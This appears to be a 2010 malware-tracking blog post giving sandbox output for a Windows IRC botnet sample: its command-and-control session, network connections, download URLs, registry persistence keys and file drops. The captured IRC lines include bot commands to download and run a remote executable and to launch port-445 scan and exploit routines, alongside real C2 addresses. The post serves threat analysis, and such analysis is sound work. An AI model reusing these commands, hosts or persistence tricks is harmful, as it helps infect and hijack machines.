update2.helohmar.com(buterfly bot hosted with United Kingdom Didjief Internation Kulinari Koncept Llc)

By Pig, November 30, 2010

DNS Lookup
Host Name IP Address
ms.allnewdots.com 208.53.131.135 ircd here

PASS laorosr
NCIK [N00_USA_XP_2598789].ç@
USER SP3-191 * 0 :EXPERIEN-9DF758
:hub.us.com 001 [N00_USA_XP_2598789]___ :us, [N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com
:
:hub.us.com 005 [N00_USA_XP_2598789]___
:[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#dpi
:hub.us.com 332 [N00_USA_XP_2598789]___ #dpi :finito
:hub.us.com 333 [N00_USA_XP_2598789]___ #dpi la 1291139776
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #dpi :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #dpi :End of /NAMES list.
MODE [N00_USA_XP_2598789].ç@ -ix

send #!,#Ma oooo
MODE #dpi -ix
:[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#!
:hub.us.com 332 [N00_USA_XP_2598789]___ #! :.asc -S|.http http://208.53.183.249/wshh.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a
:hub.us.com 333 [N00_USA_XP_2598789]___ #! Master51 1291111469
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #! :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #! :End of /NAMES list.
:[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#Ma
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #Ma :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #Ma :End of /NAMES list.
:hub.us.com 482 [N00_USA_XP_2598789]___ #dpi :You’re not channel operator
PRRVMSG #i :HTTP SET http://208.53.183.249/wshh.exe

PRRVMSG [N00_USA_XP_2598¼¹@ : Trying to get external IP.

PRRVMSG [N00_USA_XP_2598¼¹@ : Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

PRRVMSG [N00_USA_XP_2598¼¹@ : Trying to get external IP.

PRRVMSG [N00_USA_XP_2598¼¹@ : Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.

PRRVMSG [N00_USA_XP_2598¼¹@ : Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.

PRRVMSG #i :Host [192.168.0.11:445] Country [USA_SP2]

PRRVMSG #i :Host [192.168.0.11:445] Country [USA] // If its SP2 []
PRRVMSG [N00_USA_XP_2598¼¹@ : Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.

PRRVMSG [N00_USA_XP_2598¼¹@ : Sequential Port Scan started on 192.0.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

MODE #! -ix
MODE #Ma -ix
:hub.us.com 482 [N00_USA_XP_2598789]___ #! :You’re not channel operator
:hub.us.com 482 [N00_USA_XP_2598789]___ #Ma :You’re not channel operator
PING :hub.us.com
PONG hub.us.com
PING :hub.us.com
PONG hub.us.com
PRRVMSG #i :WIN2K Host [192.168.0.3:445]

PRRVMSG #i :Host [192.168.0.3:445] Country [USA] // If its SP2 []

PRRVMSG #i :WIN2K3 Host [192.242.14.227:445]

dell-d3e62f7e26 10.1.6.2
208.53.183.113 208.53.183.113
ff.fjpark.com 98.126.180.250
208.53.183.124 208.53.183.124
208.53.183.92 208.53.183.92
UDP Connections
Remote IP Address: 208.53.131.135 Port: 1863
Send Datagram: packet(s) of size 7
Send Datagram: 3 packet(s) of size 3
Send Datagram: packet(s) of size 61
Recv Datagram: 5156 packet(s) of size 0
Recv Datagram: 2 packet(s) of size 8
Recv Datagram: packet(s) of size 3
Recv Datagram: packet(s) of size 42
Remote IP Address: 98.126.180.250 Port: 9955
Send Datagram: packet(s) of size 21
Send Datagram: 4 packet(s) of size 10
Send Datagram: packet(s) of size 20
Send Datagram: 3 packet(s) of size 1
Send Datagram: 2 packet(s) of size 2
Recv Datagram: 7940 packet(s) of size 0
Recv Datagram: packet(s) of size 21
Recv Datagram: packet(s) of size 10
Recv Datagram: packet(s) of size 539
Recv Datagram: packet(s) of size 88
Recv Datagram: packet(s) of size 84
Download URLs
http://208.53.183.113/customer.file (208.53.183.113)
http://208.53.183.92/workers.data (208.53.183.92)
http://208.53.183.124/privetdata.data (208.53.183.124)

Outgoing connection to remote server: 208.53.183.113 TCP port 80
Outgoing connection to remote server: 208.53.183.92 TCP port 80
Outgoing connection to remote server: 208.53.183.124 TCP port 80DNS Lookup
Host Name IP Address
dell-d3e62f7e26 10.1.6.2
mydrivers.babypin.net 109.196.130.66
www.nippon.to
www.nippon.to 112.78.112.208
www.cooleasy.com
www.cooleasy.com 218.85.133.201
obsoletegod.com
Download URLs
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
http://218.85.133.201/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://218.85.133.201/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://218.85.133.201/cgi-bin/prxjdg.cgi (www.cooleasy.com)
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to)

Outgoing connection to remote server: mydrivers.babypin.net port 34074
Outgoing connection to remote server: www.nippon.to TCP port 80
Outgoing connection to remote server: www.cooleasy.com TCP port 80
Outgoing connection to remote server: www.nippon.to TCP port 80
Outgoing connection to remote server: www.nippon.to TCP port 80DNS Lookup
Host Name IP Address
update2.helohmar.com 91.200.242.230
mx1.hotmail.com 65.55.92.152
UDP Connections
Remote IP Address: 10.1.1.1 Port: 53
Send Datagram: packet(s) of size 29
Recv Datagram: packet(s) of size 399
Remote IP Address: 10.1.1.1 Port: 53
Send Datagram: 2 packet(s) of size 33
Recv Datagram: packet(s) of size 94
Recv Datagram: packet(s) of size 500
Remote IP Address: 10.1.1.1 Port: 53
Send Datagram: 2 packet(s) of size 33
Recv Datagram: packet(s) of size 94
Recv Datagram: packet(s) of size 500
Remote IP Address: 4.2.2.1 Port: 53
Send Datagram: 2 packet(s) of size 33
Recv Datagram: packet(s) of size 99
Remote IP Address: 4.2.2.1 Port: 53
Send Datagram: 2 packet(s) of size 33
Recv Datagram: 2 packet(s) of size 94
Download URLs
http://91.200.242.230/spm/s_get_host.php?ver=522 (update2.helohmar.com)

SMTP: 65.55.92.152:25
Outgoing connection to remote server: update2.helohmar.com TCP port 8

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402syscr.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Driver Setup” = C:WINDOWScwdrive32.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Microsoft Driver Setup” = C:WINDOWScwdrive32.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “MSODESNV7” = C:WINDOWSsystem32msvmiode.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup “ridt100413” = 1
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup “id” = 52283781519523715381965830893962
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup “host” = 91.200.242.230
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRDPNPNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWebClientNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceslanmanworkstationNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”
HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup “ridt100413”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup “id”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup “host”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”

File Changes by all processes
New Files C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402Desktop.ini
C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402syscr.exe
C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402syscr.exe
C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402Desktop.ini
.pipejfheffdsd
DeviceRasAcd
C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe
C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
.pipeezkrbvjzbmxwfh
C:DOKUME~1ADMINI~1LOKALE~1Temp4819849.exe
C:DOKUME~1ADMINI~1LOKALE~1Temp356.exe
Dfs
DeviceTcp
DeviceIp
DeviceIp
C:WINDOWScwdrive32.exe
C:WINDOWSsystem32msvmiode.exe
DeviceTcp
DeviceIp
DeviceIp
DeviceRasAcd
%windir%/lfffile32.log
DeviceRasAcd
DeviceTcp
DeviceIp
DeviceIp
DeviceTcp6
DeviceNetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F}
Opened Files .PIPElsarpc
C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
.PIPEwkssvc
.PIPEDAV RPC SERVICE
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
.Ip
C:WINDOWSRegistrationR000000000007.clb
.PIPElsarpc
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:WINDOWS
C:DOKUME~1ADMINI~1LOKALE~1Temp4819849.exe
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:WINDOWSsystem32
.Ip
%windir%/lfffile32.log
.PIPEROUTER
.PIPElsarpc
c:autoexec.bat
C:WINDOWSsystem32msvmiode.exe
.Ip
.PIPElsarpc
Deleted Files C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
Chronological Order Set File Attributes: C:RECYCLER Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402 Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create File: C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402Desktop.ini
Copy File: c:50b7d2be17284330ae1463a4578b9ca1 to C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402syscr.exe
Set File Attributes: C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402syscr.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create/Open File: C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402syscr.exe (OPEN_ALWAYS)
Create/Open File: C:RECYCLERS-1-5-21-4657300404-8583041059-826601200-3402Desktop.ini (OPEN_ALWAYS)
Create NamedPipe: .pipejfheffdsd
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Create File: C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe
Get File Attributes: c:cwsandboxcwsandbox.exe Flags: (SECURITY_ANONYMOUS)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe
Set File Attributes: C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
Copy File: C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe to C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe
Set File Attributes: C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenltzqai.exe (OPEN_EXISTING)
Create NamedPipe: .pipeezkrbvjzbmxwfh
Create File: C:DOKUME~1ADMINI~1LOKALE~1Temp4819849.exe
Create File: C:DOKUME~1ADMINI~1LOKALE~1Temp356.exe
Open File: .PIPEwkssvc (OPEN_EXISTING)
Create/Open File: Dfs (OPEN_ALWAYS)
Open File: .PIPEDAV RPC SERVICE (OPEN_EXISTING)
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temp356.exe
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temp4819849.exe
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temp853.exe
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Temp356.exe
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:WINDOWScwdrive32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:DOKUME~1ADMINI~1LOKALE~1Temp356.exe to C:WINDOWScwdrive32.exe
Set File Attributes: C:WINDOWScwdrive32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:WINDOWS ()
Find File: C:WINDOWScwdrive32.exe
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp4819849.exe (OPEN_EXISTING)
Copy File: C:DOKUME~1ADMINI~1LOKALE~1Temp4819849.exe to C:WINDOWSsystem32msvmiode.exe
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:WINDOWSsystem32 ()
Find File: C:WINDOWSsystem32msvmiode.exe
Get File Attributes: C:WINDOWSsystem32.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSHelp.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: %windir%/lfffile32.log (OPEN_EXISTING)
Create File: %windir%/lfffile32.log
Open File: .PIPEROUTER (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Open File: C:WINDOWSsystem32msvmiode.exe (OPEN_EXISTING)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Create/Open File: DeviceTcp6 (OPEN_ALWAYS)
Create/Open File: DeviceNetBT_Tcpip_{5D19E473-BE30-416B-B5C7-D8A091C41D2F} (OPEN_ALWAYS)
Open File: .PIPElsarpc (OPEN_EXISTING)

more infos about hosting there:
http://whois.domaintools.com/91.200.242.230 United Kingdom Didjief Internation Kulinari Koncept Llc

Categories: Uncategorized